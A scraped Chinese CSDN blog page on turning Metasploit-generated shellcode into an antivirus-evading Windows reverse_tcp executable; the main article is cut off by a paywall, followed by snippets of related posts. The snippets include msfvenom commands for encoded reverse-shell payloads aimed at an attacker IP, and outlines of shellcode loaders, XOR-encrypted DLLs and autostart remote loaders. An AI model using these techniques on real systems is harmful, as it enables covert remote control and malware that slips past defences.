使用shellcode打造MSF免杀payload

最新推荐文章于 2024-09-02 10:43:07 发布
最新推荐文章于 2024-09-02 10:43:07 发布
阅读量1.9k 收藏 8
点赞数
分类专栏: 安全开发 实战篇 文章标签: 免杀exe 免杀的payload kali shellcode msf玩法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kclax/article/details/93207446
版权
本文介绍了如何利用MSF生成shellcode,并通过多种方法将其编译为免杀的Windows reverse_tcp payload。测试表明,即使使用默认编译选项,生成的exe也能有效避免杀毒软件检测,且能正常执行。
摘要由CSDN通过智能技术生成

在这里插入图片描述
0x00 前言
经常有同学提及MSF payload的免杀问题,其实除了Veil之处,还有另一种比较轻巧的方案可以打造免杀的payload,那就是shellcode。
0x01 从哪里开始
shellcode是什么,可以去drops搜索学习,但这并不是本文的重点。因为MSF已经为我们提供了shellcode的生成功能,接下来我们就拿最常用的payload:reverse_tcp来做测试吧!(其它的payload均可以)
CobaltStrike:payload>windows>meterpreter>reverse_tcp设置选项如下:监听9527端口。
在这里插入图片描述
接下来以同样的方式生成c格式的payload,打开payload查看:
在这里插入图片描述
没错,你看到的是shellcode,那么如何编译成我们需要的exe呢?
0x02 如何执行shellcode
经过一番搜索,大致得到了这么几种执行shellcode的方法(c语言,其它语言执行shellcode的方法可自己去寻找)
1:

最低0.47元/天 解锁文章
Coisini、
关注
专栏目录
Kali的学习笔记篇(八)使用msf生成的shellcode制作免杀payload
Kind&红衣的博客
08-13 6589
环境:     kali-linux-2018.2-amd.iso       Visual Studio 2017     msfvenom    更新时间:2018年8月13日07:06:43 直接注入的生成方式(一): //生成c格式的后门,-p指定模块,-e 指定编码,-i指定编码次数,-f 输出格式,-b 去除指定代码 root@kali:~# msfvenom -p wi...
msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419的博客
05-13 970
生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...
shellcode免杀丨C语言三条指令免杀360!你还困吗?
HUYA69的博客
09-07 1816
shellcode免杀(1)C语言三条指令免杀360 ✉1 简介 描述有错的地方各位师傅海涵。 经过一下午的C语言测试,得出了十多种过360的·方法,这里拿三种c的方式过360(思路大体相同),还有一个c++的免杀360和火绒都可以过等有时间都可以跟大家更新。 ✉2 免杀过程 废话就不多讲了对于初学者友好发展,先看一遍制作过程,我们准备好msf和cs的shllecode msfvenom -p windows/meterpreter/reverse_tcp LHOST="自...
使用shellcode打造MSF免杀payloadshellcode加载技术
jackey3Lin的专栏
10-21 5497
0x00 前言      经常有同学提及MSF payload免杀问题,其实除了Veil之处,还有另一种比较轻巧的方案可以打造免杀payload,那就是shellcode。  0x01 从哪里开始      shellcode是什么,可以去drops搜索学习,但这并不是本文的重点。因为MSF已经为我们提供了shellcode的生成功能,接下来我们就拿最常用的payload:reverse
免杀基本知识,shellcode混淆免杀
最新发布
2401_84488537的博客
09-02 1196
1、这里首先使用msf生成基于windows的32位的反弹shell的c/c++语言格式的shellcode使用visual studio进行生成exe文件,这里使用方式四进行加载,后续会讲到。这里是五种常见的加载代码的方式,选择Release模式,系统为x86,选择生成-->生成解决方案。将生成的exe文件放到相应的win32系统上面运行,msf方面就会上线,(注意目前的shellcode没有做免杀,测试时将杀毒软件关闭)。接下来让我们分析一下这个exe文件时如何上线到正确的地址的。
exe免杀c语言,实验使用 C 编译 shellcode 免杀上线
weixin_39540018的博客
05-19 620
实验了一下这篇文章里面介绍的免杀方法:[使用 C 编译 shellcode 免杀上线](https://www.xljtj.com/archives/c-shellcode.html?from=timeline&isappinstalled=0)。这篇文章已经把步骤写的很清楚了,但是我会在本文中也记录清楚每一步,因为文章可能说没就没,记下来自己留个备份。顺便记下我遇到的几个mini tin...
使用MSF生成的shellcode打造免杀payload
MickeyMouse1928的博客
05-04 1万+
环境: 1.Kali攻击机IP:192.168.114.140 2.使用win7生成exe 步骤: 使用msfvenom生成shellcodemsfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f c win7中使用Visual studio创建Win32控制台
msf生成linux shellcode,MSF-Shellcode生成和使用
weixin_33344952的博客
05-13 584
1使用環境Kali 2.0msfvenom2Msfvenom參數說明msfvenom �Ch 查看幫助說明:Options:-p, --payload 指定需要使用payload(攻擊荷載)。如果需要使用自定義的payload,請使用'-'或者stdin指定-l, --list [module_type] 列出指定模塊的所有可用資源. 模塊類型包括: ...
利用Shellcode注入PE文件加载计算器
威化饼的一隅
04-16 3112
文章目录简介C语言版shellcode汇编版shellcodeshellcode跳转到原入口地址代码编写思路源代码 简介 采用C语言查看和修改一些PE文件的关键结构,结合shellcode,完成功能: 先用C语言编写通过LoadLibrary()和GetProcAddress()调用msvcrt.dll中的system()函数来弹出计算器的代码。在OllyDbg中打开该程序,查看对应的汇编代码和...
MSF实战免杀过静态:ShellCode加花指令
xf555er的博客
03-30 1220
第一部分(api_call)是一个通用API调用函数,用于动态查找和调用API。第二部分(reverse_tcp)创建一个反向TCP连接,将本地机器连接到攻击者的监听器。第三部分(recv)负责接收并执行第二阶段Payload。这三部分共同实现了一段完整的Shellcode,用于反向连接攻击者机器并执行远程指令。
(记录向)C格式shellcode异或加密生成dll,可免杀过 Windows Defender
daxi0ng的博客
01-13 1695
1、cs生成payload.c 2、使用https://github.com/k-fire/shellcode-To-DLL 测试用(https://github.com/k-fire/shellcode-To-DLL/blob/master/Release/call_dll.exe) 3、按照工具的操作方法生成dll文件。 4、将dll文件转化为exe。 先保存为bat,然后在转换为exe。 ...
vc++木马源码免杀一些常用方法
weixin_30877755的博客
05-04 687
1.字符串连接 ////////////////////////////////////////////////////////////把字符串"canxin"连接起来(字符串连接法) char *str1="can", *str2="xin",*str3=NULL; str3=new char[strlen(str1)+strlen(str2)+1]; strcpy(str3,str...
shellcode之360安全卫士免杀(shecodject)(一)
ZPFCD的博客
07-16 890
shellcode免杀
简单的Msf木马免杀
weixin_47948655的博客
08-12 1212
简单加密shellcode与加载器实现msf木马免杀
C/C++ 远程ShellCode执行工具
热门推荐
CSDN
07-21 1万+
通过开发一组远程代码执行盒,可以动态实现对ShellCode代码的动态载入,由于ShellCode不存放在本地客户端常量区,所以在一定程度上可以减少被杀概率,客户端只保留之基本的Socket通信功能,当需要时才会加载恶意代码运行。此工具分为服务端与客户端,客户端可以将其加入到开机自启动列表,并传入响应的参数即可,目前支持TCP/UDP/HTTP三种协议传输,后期可能会增加ICMP等来实现后门的传输工作。
python免杀基础之shellcode调用
dzqxwzoe的博客
08-23 1416
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。(摘自百度)在windows中, 如果想要调用shellcode, 那肯定逃不过win32 api的调用, 如果会汇编的话那就另说了。那在这里介绍一下常用的API。函数需要查询MSDN去了解, 需要有点win32编程基础。
网络安全中的POC、EXP、PayloadShellCode_网络安全payload是什么意思
Karka_的博客
11-04 935
POC:概念证明,即概念验证(英语:Proof of concept,简称POC)是对某些想法的一个较短而不完整的实现,以证明其可行性,示范其原理,其目的是为了验证一些概念或理论。在计算机安全术语中,概念验证经常被用来作为0day、exploit的别名。EXP:利用(英语:Exploit,简称EXP)一般指可利用系统漏洞进行攻击的动作程序。Payload:中文 ’ 有效载荷 ',指成功exploit之后,攻击代码释放的具有攻击能力的能够实现攻击者目的的代码。
C/C++加载shellcode免杀技术解析与VT免杀率分析
"这篇文章是Tide安全团队关于C和C++加载shellcode免杀技术的专题,主要讨论如何在安全的环境下使用这些技术进行学习和交流。文章提到了团队的多个安全研究方向,并分享了他们自主研发的安全平台。此外,文章还提供了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值